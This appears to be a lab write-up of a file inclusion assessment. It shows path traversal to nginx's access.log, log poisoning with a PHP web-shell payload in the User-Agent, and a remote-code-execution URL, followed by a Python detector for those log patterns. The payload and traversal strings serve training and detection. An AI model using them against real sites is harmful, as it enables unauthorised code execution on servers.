# Skills Assessment

The company `INLANEFREIGHT` has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.

They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.

***

* Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

<figure><img src="/files/04uJ1XiZKqqWBMz63dud" alt=""><figcaption></figcaption></figure>

In the main index.php we can see a possible LFI in pages; enumerate it -->

<figure><img src="/files/ZgK6h2ZA11PrIDlQ4vqG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZHxSzr5UzZ9wCdTXQAbI" alt=""><figcaption></figcaption></figure>

I decode it and I can see it in the source code -->

<figure><img src="/files/rRz425uMhNhJIIwvR7wr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/L5KGQVlOXUPX7LSOI3zh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sLFWznoLHuGBTQXtIAd0" alt=""><figcaption></figcaption></figure>

Now we have another LFI; I will try to get RCE -->

<figure><img src="/files/ydUfCitGa2Ijkh59qH9c" alt=""><figcaption></figcaption></figure>

With it we can see the version of nginx. This website uses PHP and nginx, so we need to look in the classic log directory -->

<figure><img src="/files/IkAsk0udJqHL6Qhr5WZt" alt=""><figcaption></figcaption></figure>

```
../../../../../../../../var/log/nginx/access.log
```

<figure><img src="/files/u0DgQUW1xysb2UkNHDft" alt=""><figcaption></figcaption></figure>

Now we can see that it saves the request's User-Agent, so...

```
<?php system($_GET['cmd']);?>
```

<figure><img src="/files/p87f9MGrbDOOum8CkRqy" alt=""><figcaption></figcaption></figure>

Send the request and view the logs again with the web shell command -->

```
http://94.237.61.242:54849/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id
```

<figure><img src="/files/Ju73mEnE3tv7gi3PUwk9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/eH4DhRNvX7XxQhIfBPEL" alt=""><figcaption></figcaption></figure>
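
The same sequence from the defender's side, as an added example that is not part of the original notes: a Python check that flags nginx `access.log` lines carrying a PHP open tag in a logged field, or a traversal sequence or log path in a query parameter. The log lines are constructed samples assuming nginx's default combined format, and the function and label names are chosen for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# nginx default "combined" log format (assumed for this example)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
CODE_TAG = re.compile(r'<\?(?:php|=)', re.I)        # PHP open tag stored in a log field
TRAVERSAL = re.compile(r'\.\.[/\\]')                # ../ or ..\ after decoding
LOG_PATH = re.compile(r'/var/log/|/proc/self/', re.I)

# Constructed sample lines (documentation IP range, not real traffic)
SAMPLE = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /ilf_admin/index.php HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']);?>"
203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:03:00 +0000] "GET /ilf_admin/index.php?log=%252e%252e%252fvar%252flog%252fnginx%252faccess.log HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
""".splitlines()


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def classify(line):
    """Return a list of finding labels for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    for field in ("ua", "referer", "target"):
        if CODE_TAG.search(decode(m[field])):
            findings.append(f"php-tag-in-{field}")
    query = urlsplit(m["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = decode(value)
        if TRAVERSAL.search(value):
            findings.append(f"traversal-in-{name}")
        if LOG_PATH.search(value):
            findings.append(f"log-path-in-{name}")
    return findings


if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry[:60])
```

A PHP tag in the User-Agent followed by a request whose parameter resolves to the log file itself, from the same client, is the pair worth alerting on.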


